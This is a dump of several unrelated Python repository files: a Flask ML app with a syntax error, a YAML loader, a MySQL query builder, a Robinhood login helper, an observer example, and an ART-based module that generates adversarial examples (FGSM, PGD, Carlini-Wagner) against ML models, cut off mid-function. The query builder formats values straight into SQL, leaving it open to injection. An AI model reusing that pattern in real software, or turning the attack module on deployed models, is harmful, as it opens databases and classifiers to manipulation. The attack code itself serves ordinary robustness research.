Python
app.py
nidhi988/Deploying-ML-Algo-using-Flask-on-Heroku
9efbd51e8eaf26c9411f430db62d0cc06da34269
[ "MIT" ]
null
null
null
app.py
nidhi988/Deploying-ML-Algo-using-Flask-on-Heroku
9efbd51e8eaf26c9411f430db62d0cc06da34269
[ "MIT" ]
null
null
null
app.py
nidhi988/Deploying-ML-Algo-using-Flask-on-Heroku
9efbd51e8eaf26c9411f430db62d0cc06da34269
[ "MIT" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # In[ ]: import os import numpy as np import flask import pickle from flask import Flask,render_template,request app=Flask(__name__) @app.route('/') @app.route('/index') def index: return flask.render_template('index.html') # In[ ]: #prediction function def ValuePredictor(to_predict_list): to_predict = np.array(to_predict_list).reshape(1,12) loaded_model = pickle.load(open("model.pkl","rb")) result = loaded_model.predict(to_predict) return result[0] @app.route('/result',methods = ['POST']) def result(): if request.method == 'POST': to_predict_list = request.form.to_dict() to_predict_list=list(to_predict_list.values()) to_predict_list = list(map(int, to_predict_list)) result = ValuePredictor(to_predict_list) if int(result)==1: prediction='Income more than 50K' else: prediction='Income less that 50K' return render_template("result.html",prediction=prediction) # In[ ]: # In[ ]: # In[ ]:
16.738462
67
0.644301
import os import numpy as np import flask import pickle from flask import Flask,render_template,request app=Flask(__name__) @app.route('/') @app.route('/index') def index: return flask.render_template('index.html') def ValuePredictor(to_predict_list): to_predict = np.array(to_predict_list).reshape(1,12) loaded_model = pickle.load(open("model.pkl","rb")) result = loaded_model.predict(to_predict) return result[0] @app.route('/result',methods = ['POST']) def result(): if request.method == 'POST': to_predict_list = request.form.to_dict() to_predict_list=list(to_predict_list.values()) to_predict_list = list(map(int, to_predict_list)) result = ValuePredictor(to_predict_list) if int(result)==1: prediction='Income more than 50K' else: prediction='Income less that 50K' return render_template("result.html",prediction=prediction)
false
true
f728fb56317a5077e89063574c3601f0f6fd25e2
590
py
Python
connexion/openapi_spec_validator/loaders.py
peachfinance/connexion
c2dd9534868db1b68188bec62b001e4dfbb7d372
[ "Apache-2.0" ]
null
null
null
connexion/openapi_spec_validator/loaders.py
peachfinance/connexion
c2dd9534868db1b68188bec62b001e4dfbb7d372
[ "Apache-2.0" ]
null
null
null
connexion/openapi_spec_validator/loaders.py
peachfinance/connexion
c2dd9534868db1b68188bec62b001e4dfbb7d372
[ "Apache-2.0" ]
null
null
null
from yaml.composer import Composer from yaml.parser import Parser from yaml.reader import Reader from yaml.resolver import Resolver from yaml.scanner import Scanner from ..openapi_spec_validator.constructors import ExtendedSafeConstructor class ExtendedSafeLoader( Reader, Scanner, Parser, Composer, ExtendedSafeConstructor, Resolver): def __init__(self, stream): Reader.__init__(self, stream) Scanner.__init__(self) Parser.__init__(self) Composer.__init__(self) ExtendedSafeConstructor.__init__(self) Resolver.__init__(self)
29.5
78
0.754237
from yaml.composer import Composer from yaml.parser import Parser from yaml.reader import Reader from yaml.resolver import Resolver from yaml.scanner import Scanner from ..openapi_spec_validator.constructors import ExtendedSafeConstructor class ExtendedSafeLoader( Reader, Scanner, Parser, Composer, ExtendedSafeConstructor, Resolver): def __init__(self, stream): Reader.__init__(self, stream) Scanner.__init__(self) Parser.__init__(self) Composer.__init__(self) ExtendedSafeConstructor.__init__(self) Resolver.__init__(self)
true
true
f728fbb5034433c6c19528a025677582c5ec9d8b
9,816
py
Python
pydavis/db_manager.py
GSEL9/web-scraping
4ff8e7539ea182a481b8044284691015136010a5
[ "MIT" ]
1
2018-06-17T18:18:48.000Z
2018-06-17T18:18:48.000Z
pydavis/db_manager.py
GSEL9/web-scraping
4ff8e7539ea182a481b8044284691015136010a5
[ "MIT" ]
1
2018-06-12T10:17:35.000Z
2018-06-12T12:51:43.000Z
pydavis/db_manager.py
GSEL9/web-scraping
4ff8e7539ea182a481b8044284691015136010a5
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # # db_manager.py # # The module is part of pydavis. # """ Interacting with MySQL databases through the DatabaseManager. """ __author__ = 'Severin E. R. Langberg' __email__ = 'Langberg91@gmail.no' __status__ = 'Operational' import pymysql from pydavis import utils from datetime import datetime class DatabaseManager: """Handles interaction with MySQL database. Args: user (str): Follows from writing data to table. The MySQL username credential. Necessary for connecting to database. password (str): Follows from writing data to table. The MySQL password credential. Necessary for connecting to database. host (str): Specifies the host where the server is running. Uses localhost by default. port (int): Specifies port number. Uses 3306 by default. database (str): Follows from writing data to table. Name of an existing database, or the name of a database that will be created. """ _CHARS_LIMIT = 20 @classmethod def update_limit_varchars(cls, new_limit): """Defines the maximum number of characters assigned to string attributes in the created database tables. Args: new_limit (int): The maximum number of characters assigned to string attributes. """ utils._check_parameter('new_limit', int, new_limit) cls._CHARS_LIMIT = new_limit def __init__(self, user, password, host='localhost', port=3306): self.user = str(user) self.password = str(password) self.host = str(host) self.port = int(port) # NOTE: Variables set during instance. self._con = None self._cur = None self._query = None self._current_db = None @property def connection(self): """Returns database connection.""" return self._con @property def current_db(self): """Returns name of working database.""" return self._current_db @property def query(self): """Returns the latest MySQL query ready to be executed.""" return self._query @property def results(self): """Returns the result from a database query.""" return self._cur.fetchall() @property def limit_varchars(self): """Returns the current limit to number of characters in varchar variables.""" return self._CHARS_LIMIT def connect(self): """Connects to a MySQL server.""" if self.connection: print('Already connected to `{}`'.format(self.host)) return try: con = pymysql.connect(host=self.host, port=self.port, user=self.user, passwd=self.password) print('Connecting to: `{}`'.format(self.host)) self._con = con self._cur = self._con.cursor() except: raise utils.DatabaseConnectionError('Unable to connect to: `{}`' ''.format(self.host)) return self def _check_connection(self): # Checks if connected to a MySQL server. if self.connection: return else: raise utils.DatabaseConnectionError('Disconnected from {}' ''.format(self.host)) def _check_database(self): if self.current_db: return else: raise utils.MissingDatabaseError('Must specify working database') def execute(self): """Execute a MySQL command and commit changes to the database.""" self._check_connection() try: self._cur.execute(self._query) except: raise utils.DatabaseExecutionError('Unable to execute query:\n' '`{}`'.format(self._query)) # Commit changes to database. try: self._con.commit() except: raise utils.DatabaseCommitError('Unable to commit changes: `{}`' ''.format(self._db_name)) return self def create_database(self, database): """Creates a new database. Only enabled if connected to a MySQL server. Args: database (str): Name of the database to create. """ utils._check_parameter('database', str, database) self._current_db = database self._query = 'CREATE DATABASE IF NOT EXISTS {};'.format(database) return self def use_database(self, database): """Selects an existent database as working database. Only enabled if connected to a MySQL server and the database exists. Args: database (str): Name of the new working database. """ utils._check_parameter('database', str, database) self._current_db = database self._query = 'USE {}'.format(database) return self def drop_database(self, database): """Deletes a database. Only enabled if connected to a MySQL server. Args: database (str): Name of the database to delete. """ utils._check_parameter('database', str, database) # Resetting working DB variable. self._current_db = None self._query = 'DROP DATABASE IF EXISTS {};'.format(database) return self def create_table(self, table_name, table_columns): """Creates a table if connected to a MySQL server and a working database is set. Args: table_name (str): Name of the new table. table_columns (dict): The column labels and corresponding column data types as key-value pairs. The data types are given in Python format. """ self._check_database() utils._check_parameter('table_name', str, table_name) utils._check_parameter('table_columns', dict, table_columns) col_labels, col_dtypes = list(zip(*table_columns.items())) mysql_dtypes = self.convert_dtypes(col_dtypes) _columns = '' for label, dtype in zip(col_labels[:-1], mysql_dtypes[:-1]): _columns += ' {} {},'.format(label, dtype) _columns += ' {} {}'.format(col_labels[-1], mysql_dtypes[-1]) self._query = """CREATE TABLE IF NOT EXISTS {} ({}); """.format(table_name, _columns) return self def convert_dtypes(self, data_types): """Converts from Python to MySQL data types. Args: data_types (iterable): A container of Python data types that will be converted to MySQL data types. Returns: list: The corresponding MySQL data types. """ mysql_dtypes = [] for data_type in data_types: if data_type is datetime: mysql_dtypes.append('DATETIME') elif data_type is float: mysql_dtypes.append('FLOAT') elif data_type is int: mysql_dtypes.append('INT') elif data_type is str: mysql_dtypes.append('VARCHAR({})'.format(self._CHARS_LIMIT)) else: raise TypeError('Unable to recognize {} as data type' ''.format(data_type)) return mysql_dtypes def drop_table(self, table_name): """Deletes specified table from database. Only enabled if connected to a MySQL server and a working database is set. Args: table_name (str): Name of the table. """ self._check_database() utils._check_parameter('table_name', str, table_name) self._query = 'DROP TABLE IF EXISTS {};'.format(table_name) return self def describe_table(self, table_name): """Returns description of table content. Only enabled if connected to a MySQL server and a working database is set. Args: table_name (str): Name of the table. """ self._check_database() utils._check_parameter('table_name', str, table_name) self._query = 'DESCRIBE {};'.format(table_name) return self def insert_values(self, table_name, table_values): """Inserts entities into a table. Args: table_name (str): The name of the table. table_values (dict): The column labels and corresponding values as key-value pairs. """ self._check_database() utils._check_parameter('table_name', str, table_name) utils._check_parameter('table_values', dict, table_values) labels, values = list(zip(*table_values.items())) _columns, _values = '', '' for label, value in zip(labels[:-1], values[:-1]): _columns += "{}, ".format(str(label)) _values += "'{}', ".format(str(value)) _columns += "{}".format(str(labels[-1])) _values += "'{}'".format(str(values[-1])) self._query = """INSERT INTO {} ({}) VALUES ({}); """.format(table_name, _columns, _values) return self def add_constraints(self, table_name, constraints): raise NotImplementedError('Method currently not implemented.') def terminate_connection(self): """Shuts down connection to MySQL server.""" self._con.close() self._cur.close() print('Shutting down connection to: `{}`'.format(self.host)) # NOTE: Resetting connection variables. self._con = None self._cur = None return self
27.266667
79
0.580685
__author__ = 'Severin E. R. Langberg' __email__ = 'Langberg91@gmail.no' __status__ = 'Operational' import pymysql from pydavis import utils from datetime import datetime class DatabaseManager: _CHARS_LIMIT = 20 @classmethod def update_limit_varchars(cls, new_limit): utils._check_parameter('new_limit', int, new_limit) cls._CHARS_LIMIT = new_limit def __init__(self, user, password, host='localhost', port=3306): self.user = str(user) self.password = str(password) self.host = str(host) self.port = int(port) self._con = None self._cur = None self._query = None self._current_db = None @property def connection(self): return self._con @property def current_db(self): return self._current_db @property def query(self): return self._query @property def results(self): return self._cur.fetchall() @property def limit_varchars(self): return self._CHARS_LIMIT def connect(self): if self.connection: print('Already connected to `{}`'.format(self.host)) return try: con = pymysql.connect(host=self.host, port=self.port, user=self.user, passwd=self.password) print('Connecting to: `{}`'.format(self.host)) self._con = con self._cur = self._con.cursor() except: raise utils.DatabaseConnectionError('Unable to connect to: `{}`' ''.format(self.host)) return self def _check_connection(self): if self.connection: return else: raise utils.DatabaseConnectionError('Disconnected from {}' ''.format(self.host)) def _check_database(self): if self.current_db: return else: raise utils.MissingDatabaseError('Must specify working database') def execute(self): self._check_connection() try: self._cur.execute(self._query) except: raise utils.DatabaseExecutionError('Unable to execute query:\n' '`{}`'.format(self._query)) try: self._con.commit() except: raise utils.DatabaseCommitError('Unable to commit changes: `{}`' ''.format(self._db_name)) return self def create_database(self, database): utils._check_parameter('database', str, database) self._current_db = database self._query = 'CREATE DATABASE IF NOT EXISTS {};'.format(database) return self def use_database(self, database): utils._check_parameter('database', str, database) self._current_db = database self._query = 'USE {}'.format(database) return self def drop_database(self, database): utils._check_parameter('database', str, database) self._current_db = None self._query = 'DROP DATABASE IF EXISTS {};'.format(database) return self def create_table(self, table_name, table_columns): self._check_database() utils._check_parameter('table_name', str, table_name) utils._check_parameter('table_columns', dict, table_columns) col_labels, col_dtypes = list(zip(*table_columns.items())) mysql_dtypes = self.convert_dtypes(col_dtypes) _columns = '' for label, dtype in zip(col_labels[:-1], mysql_dtypes[:-1]): _columns += ' {} {},'.format(label, dtype) _columns += ' {} {}'.format(col_labels[-1], mysql_dtypes[-1]) self._query = """CREATE TABLE IF NOT EXISTS {} ({}); """.format(table_name, _columns) return self def convert_dtypes(self, data_types): mysql_dtypes = [] for data_type in data_types: if data_type is datetime: mysql_dtypes.append('DATETIME') elif data_type is float: mysql_dtypes.append('FLOAT') elif data_type is int: mysql_dtypes.append('INT') elif data_type is str: mysql_dtypes.append('VARCHAR({})'.format(self._CHARS_LIMIT)) else: raise TypeError('Unable to recognize {} as data type' ''.format(data_type)) return mysql_dtypes def drop_table(self, table_name): self._check_database() utils._check_parameter('table_name', str, table_name) self._query = 'DROP TABLE IF EXISTS {};'.format(table_name) return self def describe_table(self, table_name): self._check_database() utils._check_parameter('table_name', str, table_name) self._query = 'DESCRIBE {};'.format(table_name) return self def insert_values(self, table_name, table_values): self._check_database() utils._check_parameter('table_name', str, table_name) utils._check_parameter('table_values', dict, table_values) labels, values = list(zip(*table_values.items())) _columns, _values = '', '' for label, value in zip(labels[:-1], values[:-1]): _columns += "{}, ".format(str(label)) _values += "'{}', ".format(str(value)) _columns += "{}".format(str(labels[-1])) _values += "'{}'".format(str(values[-1])) self._query = """INSERT INTO {} ({}) VALUES ({}); """.format(table_name, _columns, _values) return self def add_constraints(self, table_name, constraints): raise NotImplementedError('Method currently not implemented.') def terminate_connection(self): self._con.close() self._cur.close() print('Shutting down connection to: `{}`'.format(self.host)) self._con = None self._cur = None return self
true
true
f728fbd6e877db07c02c891160f467f15e63c3f5
393
py
Python
stockze/example_app/utils/robinhood_login.py
vendari12/django-ai-algotrade
f20d2691f08ec75f148cd6409b886b1dd6edac78
[ "Apache-1.1" ]
10
2021-06-25T09:54:11.000Z
2022-03-24T19:18:13.000Z
stockze/example_app/utils/robinhood_login.py
vendari12/django-ai-algotrade
f20d2691f08ec75f148cd6409b886b1dd6edac78
[ "Apache-1.1" ]
12
2021-06-24T22:45:11.000Z
2022-03-31T17:17:41.000Z
stockze/example_app/utils/robinhood_login.py
vendari12/django-ai-algotrade
f20d2691f08ec75f148cd6409b886b1dd6edac78
[ "Apache-1.1" ]
2
2021-08-13T21:30:06.000Z
2022-03-24T06:05:16.000Z
import time import robin_stocks.robinhood as rh from pyotp import TOTP as otp from environ import Env env = Env() def robinhood_login(): totp = otp(env('RH_DEVICE_TOKEN')).now() rh.authentication.login( username=env('RH_USERNAME'), password=env('RH_PASSWORD'), mfa_code=totp ) print('logged in to robinhood.') time.sleep(float(env('RH_SLEEP')))
20.684211
44
0.669211
import time import robin_stocks.robinhood as rh from pyotp import TOTP as otp from environ import Env env = Env() def robinhood_login(): totp = otp(env('RH_DEVICE_TOKEN')).now() rh.authentication.login( username=env('RH_USERNAME'), password=env('RH_PASSWORD'), mfa_code=totp ) print('logged in to robinhood.') time.sleep(float(env('RH_SLEEP')))
true
true
f728fbdbcf1fb1511aa415cb515dce27dd695803
2,475
py
Python
doc/examples/observer.py
djkool/OcempGUI3
43a68033cb0dbad10654231299cb762cd18b7c25
[ "BSD-2-Clause" ]
null
null
null
doc/examples/observer.py
djkool/OcempGUI3
43a68033cb0dbad10654231299cb762cd18b7c25
[ "BSD-2-Clause" ]
null
null
null
doc/examples/observer.py
djkool/OcempGUI3
43a68033cb0dbad10654231299cb762cd18b7c25
[ "BSD-2-Clause" ]
null
null
null
# Subject/Observer usage example. from ocempgui.events import Subject, IObserver # The subject that should notify observers about state changes. class MyObject (Subject): def __init__ (self): Subject.__init__ (self, "MyObject") self._x = "Simple Attribute" self._y = 1234567890 self._z = None def get_x (self): return self._x def set_x (self, value): # Preserve old value. old = self._x self._x = value # Notify about change. self.notify ("x", old, value) def get_y (self): return self._y def set_y (self, value): # Preserve old value. old = self._y self._y = value # Notify about change. self.notify ("y", old, value) def get_z (self): return self._z def set_z (self, value): # Preserve old value. old = self._z self._z = value # Notify about change. self.notify ("z", old, value) x = property (get_x, set_x) y = property (get_y, set_y) z = property (get_z, set_z) class OwnObserver (IObserver): def __init__ (self): pass def update (self, subject, prop, oldval, newval): if subject == "MyObject": # A MyObject instance, check details. if prop == "x": # Its x value changed. print "The x value of a MyObject instance changed from " \ "%s to %s" % (str (oldval), str (newval)) elif prop == "y": # Its y value changed. print "The y value of a MyObject instance changed from " \ "%s to %s" % (str (oldval), str (newval)) else: # Another value changed. print "The %s value of a MyObject instance changed from" \ "%s to %s" % (str (prop), str (oldval), str (newval)) class AnotherObserver (IObserver): def __init__ (self): pass def update (self, subject, prop, oldval, newval): print "Detail %s of %s changed from %s to %s" % (str (prop), subject, str (oldval), str (newval)) subject = MyObject () # Add tow observers doing observer1 = OwnObserver () observer2 = AnotherObserver () subject.add (observer1, observer2) subject.x = "FooBarBaz" subject.y = subject.x * 3 subject.z = 100
29.117647
77
0.534949
from ocempgui.events import Subject, IObserver class MyObject (Subject): def __init__ (self): Subject.__init__ (self, "MyObject") self._x = "Simple Attribute" self._y = 1234567890 self._z = None def get_x (self): return self._x def set_x (self, value): old = self._x self._x = value self.notify ("x", old, value) def get_y (self): return self._y def set_y (self, value): old = self._y self._y = value self.notify ("y", old, value) def get_z (self): return self._z def set_z (self, value): old = self._z self._z = value self.notify ("z", old, value) x = property (get_x, set_x) y = property (get_y, set_y) z = property (get_z, set_z) class OwnObserver (IObserver): def __init__ (self): pass def update (self, subject, prop, oldval, newval): if subject == "MyObject": if prop == "x": print "The x value of a MyObject instance changed from " \ "%s to %s" % (str (oldval), str (newval)) elif prop == "y": print "The y value of a MyObject instance changed from " \ "%s to %s" % (str (oldval), str (newval)) else: print "The %s value of a MyObject instance changed from" \ "%s to %s" % (str (prop), str (oldval), str (newval)) class AnotherObserver (IObserver): def __init__ (self): pass def update (self, subject, prop, oldval, newval): print "Detail %s of %s changed from %s to %s" % (str (prop), subject, str (oldval), str (newval)) subject = MyObject () observer1 = OwnObserver () observer2 = AnotherObserver () subject.add (observer1, observer2) subject.x = "FooBarBaz" subject.y = subject.x * 3 subject.z = 100
false
true
f728fc01673c1c4f062e079427d221749f3040d6
11,111
py
Python
src/attacks/attack.py
Kronemeyer/project-athena
0e79cba1c4d30146326ce7bd311f69f2ee845e80
[ "MIT" ]
2
2020-10-01T08:27:13.000Z
2020-10-01T20:23:04.000Z
src/attacks/attack.py
Kronemeyer/project-athena
0e79cba1c4d30146326ce7bd311f69f2ee845e80
[ "MIT" ]
3
2020-09-29T13:57:24.000Z
2020-10-01T20:26:03.000Z
src/attacks/attack.py
Kronemeyer/project-athena
0e79cba1c4d30146326ce7bd311f69f2ee845e80
[ "MIT" ]
1
2020-12-04T07:56:32.000Z
2020-12-04T07:56:32.000Z
""" Implement white-box attacks on top of IBM ART. @author: Ying Meng (y(dot)meng201011(at)gmail(dot)com) """ import numpy as np import torch # from art.attacks.evasion.fast_gradient import FastGradientMethod # from art.attacks.evasion.projected_gradient_descent import ProjectedGradientDescent from art.attacks.evasion.carlini import CarliniL2Method, CarliniLInfMethod from art.attacks.evasion.deepfool import DeepFool from art.attacks.evasion.saliency_map import SaliencyMapMethod from art.attacks.evasion.iterative_method import BasicIterativeMethod from art.attacks.evasion.spatial_transformation import SpatialTransformation from art.attacks.evasion.hop_skip_jump import HopSkipJump from art.attacks.evasion.zoo import ZooAttack from attacks.fast_gradient import FastGradientMethod from attacks.pgd import ProjectedGradientDescent from attacks.utils import WHITEBOX_ATTACK as ATTACK def generate(model, data_loader, attack_args, device=None): """ Generate adversarial examples. :param model: an instances of art.classifiers.classifier. The targeted model. :param data_loader: a tuple of benign samples and corresponding true labels. :param attack_args: dictionary. adversarial configurations. :param device: string. cuda (for gpu) or cpu. :return: """ attack = attack_args.get('attack').lower() eot = attack_args.get('eot') if eot and attack not in [ATTACK.FGSM.value, ATTACK.PGD.value]: raise NotImplementedError("`EOT` is not supported for {} attack yet.".format(attack)) print(">>> Generating {}(EOT:{}) examples.".format(attack_args.get('description'), "ON" if eot else "OFF")) if device is None: device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') images, labels = data_loader if attack == ATTACK.FGSM.value: return _fgsm(model, images, labels, attack_args) elif attack == ATTACK.CW.value: return _cw(model, images, labels, attack_args) elif attack == ATTACK.PGD.value: return _pgd(model, images, labels, attack_args) elif attack == ATTACK.BIM.value: return _bim(model, images, labels, attack_args) elif attack == ATTACK.JSMA.value: return _jsma(model, images, labels, attack_args) elif attack == ATTACK.DF.value: return _df(model, images, labels, attack_args) elif attack == ATTACK.MIM.value: return _mim(model, images, labels, attack_args) elif attack == ATTACK.OP.value: return _op(model, images, labels, attack_args) elif attack == ATTACK.HOP_SKIP_JUMP.value: raise _hop_skip_jump(model, images, labels, attack_args) elif attack == ATTACK.SPATIAL_TRANS.value: return _spatial(model, images, labels, attack_args) elif attack == ATTACK.ZOO.value: return _zoo(model, images, labels, attack_args) else: raise ValueError('{} is not supported.'.format(attack)) def _fgsm(model, data, labels, attack_args): """ Fast Gradient Sign Method Explaining and Harnessing Adversarial Examples by Ian J. Goodfellow, Jonathon Shlens, Christian Szegedy ``https://arxiv.org/abs/1412.6572`` :param model: :param data: :param labels: :param attack_args: :param distribution: dictionary. the configurations of distribution (for EOT) :return: """ eps = attack_args.get('eps', 0.3) targeted = attack_args.get('targeted', False) num_random_init = attack_args.get('num_random_init', 0) minimal = attack_args.get('minimal', False) if attack_args.get("eot"): distribution = attack_args.get('distribution', None) else: distribution = None attacker = FastGradientMethod(model, eps=eps, eps_step=eps, targeted=targeted, num_random_init=num_random_init, minimal=minimal, distribution=distribution) return attacker.generate(data, labels) def _cw(model, data, labels, attack_args): """ Carlini & Wanger Towards Evaluating the Robustness of Neural Networks by Nicholas Carlini, David Wagner ``https://arxiv.org/abs/1608.04644`` :param model: :param data: :param labels: :param attack_args: :return: """ norm = attack_args.get('norm').lower() lr = attack_args.get('lr') max_iter = attack_args.get('max_iter', 10) # use default values for the following arguments confidence = attack_args.get('confidence', 0.0) targeted = attack_args.get('targeted', False) init_const = attack_args.get('init_const', 0.01) max_halving = attack_args.get('max_halving', 5) max_doubling = attack_args.get('max_doubling', 5) if norm == 'l2': print('>>> Generating CW_l2 examples.') binary_search_steps = attack_args.get('binary_search_steps', 10) attacker = CarliniL2Method(classifier=model, confidence=confidence, targeted=targeted, learning_rate=lr, binary_search_steps=binary_search_steps, max_iter=max_iter, initial_const=init_const, max_halving=max_halving, max_doubling=max_doubling) elif norm == 'linf': print('>>> Generating CW_linf examples.') eps = attack_args.get('eps', 0.3) attacker = CarliniLInfMethod(classifier=model, confidence=confidence, targeted=targeted, learning_rate=lr, max_iter=max_iter, max_halving=max_halving, max_doubling=max_doubling, eps=eps) else: raise ValueError('Support `l2` and `linf` norms. But found {}'.format(norm)) return attacker.generate(data, labels) def _pgd(model, data, labels, attack_args): """ Projected Gradient Descent Towards deep learning models resistant to adversarial attacks by Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt, Dimitris Tsipras, and Adrian Vladu. ``https://arxiv.org/abs/1706.06083`` :param model: :param data: :param labels: :param attack_args: :return: """ eps = attack_args.get('eps', 0.3) eps_step = attack_args.get('eps_step', eps/10.) max_iter = attack_args.get('max_iter', 10) norm = _get_norm_value(attack_args.get('norm', 'linf')) targeted = attack_args.get('targeted', False) num_random_init = attack_args.get('num_random_init', 0) random_eps = attack_args.get('random_eps', False) if attack_args.get("eot"): distribution = attack_args.get('distribution', None) else: distribution = None attacker = ProjectedGradientDescent(classifier=model, norm=norm, eps=eps, eps_step=eps_step, max_iter=max_iter, targeted=targeted, num_random_init=num_random_init, random_eps=random_eps, distribution=distribution) return attacker.generate(data, labels) def _bim(model, data, labels, attack_args): """ Basic Iteractive Method ADVERSARIAL EXAMPLES IN THE PHYSICAL WORLD Alexey Kurakin, Ian J. Goodfellow, Samy Bengio ``https://arxiv.org/pdf/1607.02533.pdf`` :param model: :param data: :param labels: :param attack_args: :return: """ eps = attack_args.get('eps', 0.3) eps_step = attack_args.get('eps_step', eps/10.) max_iter = attack_args.get('max_iter', 100) targeted = attack_args.get('targeted', False) attacker = BasicIterativeMethod(classifier=model, eps=eps, eps_step=eps_step, max_iter=max_iter, targeted=targeted) return attacker.generate(data, labels) def _jsma(model, data, labels, attack_args): theta = attack_args.get('theta', 0.15) gamma = attack_args.get('gamma', 0.5) batch_size = attack_args.get('batch_size', 1) attacker = SaliencyMapMethod(classifier=model, theta=theta, gamma=gamma, batch_size=batch_size) return attacker.generate(data, labels) def _df(model, data, labels, attack_args): max_iter = attack_args.get('max_iter', 100) eps = attack_args.get('eps', 0.01) nb_grads = attack_args.get('nb_grads', 10) attacker = DeepFool(classifier=model, max_iter=max_iter, epsilon=eps, nb_grads=nb_grads) return attacker.generate(data, labels) def _mim(model, data, labels, attack_args): raise NotImplementedError def _op(model, data, labels, attack_args): raise NotImplementedError def _spatial(model, data, labels, attack_args): max_translation = attack_args.get('max_translation', 0.2) num_translations = attack_args.get('num_translations', 1) max_rotation = attack_args.get('max_rotation', 10) num_rotations = attack_args.get('num_rotations', 1) attacker = SpatialTransformation(classifier=model, max_translation=max_translation, num_translations=num_translations, max_rotation=max_rotation, num_rotations=num_rotations) return attacker.generate(data, labels) def _hop_skip_jump(model, data, labels, attack_args): norm = _get_norm_value(attack_args.get('norm', 'l2')) max_iter = attack_args.get('max_iter', 50) max_eval = attack_args.get('max_eval', 10000) init_eval = attack_args.get('init_eval', 100) init_size = attack_args.get('init_size', 100) targeted = attack_args.get('targeted', False) attacker = HopSkipJump(classifier=model, targeted=targeted, norm=norm, max_iter=max_iter, max_eval=max_eval, init_eval=init_eval, init_size=init_size) return attacker.generate(data, labels) def _zoo(model, data, labels, attack_args): lr = attack_args.get('learning_rate', 0.01) max_iter = attack_args.get('max_iter', 10) binary_search_steps = attack_args.get('binary_search_steps', 1) confidence = attack_args.get('confidence', 0.0) targeted = attack_args.get('targeted', False) init_const = attack_args.get('init_const', 1e-3) abort_early = attack_args.get('abort_early', True) use_resize = attack_args.get('use_resize', True) use_importance = attack_args.get('use_importance', True) nb_parallel = attack_args.get('nb_parallel', 128) variable_h = attack_args.get('variable_h', 1e-4) attacker = ZooAttack(classifier=model, confidence=confidence, targeted=targeted, learning_rate=lr, max_iter=max_iter, binary_search_steps=binary_search_steps, initial_const=init_const, abort_early=abort_early, use_resize=use_resize, use_importance=use_importance, nb_parallel=nb_parallel, variable_h=variable_h) return attacker.generate(data, labels) def _get_norm_value(norm): """ Convert a string norm to a numeric value. :param norm: :return: """ norm = norm.lower() if norm == 'linf': value = np.inf elif norm == 'l2': value = 2 else: raise ValueError('Support `l2` and `linf` norms. But found {}.'.format(norm)) return value
37.792517
116
0.676177
import numpy as np import torch from art.attacks.evasion.carlini import CarliniL2Method, CarliniLInfMethod from art.attacks.evasion.deepfool import DeepFool from art.attacks.evasion.saliency_map import SaliencyMapMethod from art.attacks.evasion.iterative_method import BasicIterativeMethod from art.attacks.evasion.spatial_transformation import SpatialTransformation from art.attacks.evasion.hop_skip_jump import HopSkipJump from art.attacks.evasion.zoo import ZooAttack from attacks.fast_gradient import FastGradientMethod from attacks.pgd import ProjectedGradientDescent from attacks.utils import WHITEBOX_ATTACK as ATTACK def generate(model, data_loader, attack_args, device=None): attack = attack_args.get('attack').lower() eot = attack_args.get('eot') if eot and attack not in [ATTACK.FGSM.value, ATTACK.PGD.value]: raise NotImplementedError("`EOT` is not supported for {} attack yet.".format(attack)) print(">>> Generating {}(EOT:{}) examples.".format(attack_args.get('description'), "ON" if eot else "OFF")) if device is None: device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') images, labels = data_loader if attack == ATTACK.FGSM.value: return _fgsm(model, images, labels, attack_args) elif attack == ATTACK.CW.value: return _cw(model, images, labels, attack_args) elif attack == ATTACK.PGD.value: return _pgd(model, images, labels, attack_args) elif attack == ATTACK.BIM.value: return _bim(model, images, labels, attack_args) elif attack == ATTACK.JSMA.value: return _jsma(model, images, labels, attack_args) elif attack == ATTACK.DF.value: return _df(model, images, labels, attack_args) elif attack == ATTACK.MIM.value: return _mim(model, images, labels, attack_args) elif attack == ATTACK.OP.value: return _op(model, images, labels, attack_args) elif attack == ATTACK.HOP_SKIP_JUMP.value: raise _hop_skip_jump(model, images, labels, attack_args) elif attack == ATTACK.SPATIAL_TRANS.value: return _spatial(model, images, labels, attack_args) elif attack == ATTACK.ZOO.value: return _zoo(model, images, labels, attack_args) else: raise ValueError('{} is not supported.'.format(attack)) def _fgsm(model, data, labels, attack_args): eps = attack_args.get('eps', 0.3) targeted = attack_args.get('targeted', False) num_random_init = attack_args.get('num_random_init', 0) minimal = attack_args.get('minimal', False) if attack_args.get("eot"): distribution = attack_args.get('distribution', None) else: distribution = None attacker = FastGradientMethod(model, eps=eps, eps_step=eps, targeted=targeted, num_random_init=num_random_init, minimal=minimal, distribution=distribution) return attacker.generate(data, labels) def _cw(model, data, labels, attack_args): norm = attack_args.get('norm').lower() lr = attack_args.get('lr') max_iter = attack_args.get('max_iter', 10) confidence = attack_args.get('confidence', 0.0) targeted = attack_args.get('targeted', False) init_const = attack_args.get('init_const', 0.01) max_halving = attack_args.get('max_halving', 5) max_doubling = attack_args.get('max_doubling', 5) if norm == 'l2': print('>>> Generating CW_l2 examples.') binary_search_steps = attack_args.get('binary_search_steps', 10) attacker = CarliniL2Method(classifier=model, confidence=confidence, targeted=targeted, learning_rate=lr, binary_search_steps=binary_search_steps, max_iter=max_iter, initial_const=init_const, max_halving=max_halving, max_doubling=max_doubling) elif norm == 'linf': print('>>> Generating CW_linf examples.') eps = attack_args.get('eps', 0.3) attacker = CarliniLInfMethod(classifier=model, confidence=confidence, targeted=targeted, learning_rate=lr, max_iter=max_iter, max_halving=max_halving, max_doubling=max_doubling, eps=eps) else: raise ValueError('Support `l2` and `linf` norms. But found {}'.format(norm)) return attacker.generate(data, labels) def _pgd(model, data, labels, attack_args): eps = attack_args.get('eps', 0.3) eps_step = attack_args.get('eps_step', eps/10.) max_iter = attack_args.get('max_iter', 10) norm = _get_norm_value(attack_args.get('norm', 'linf')) targeted = attack_args.get('targeted', False) num_random_init = attack_args.get('num_random_init', 0) random_eps = attack_args.get('random_eps', False) if attack_args.get("eot"): distribution = attack_args.get('distribution', None) else: distribution = None attacker = ProjectedGradientDescent(classifier=model, norm=norm, eps=eps, eps_step=eps_step, max_iter=max_iter, targeted=targeted, num_random_init=num_random_init, random_eps=random_eps, distribution=distribution) return attacker.generate(data, labels) def _bim(model, data, labels, attack_args): eps = attack_args.get('eps', 0.3) eps_step = attack_args.get('eps_step', eps/10.) max_iter = attack_args.get('max_iter', 100) targeted 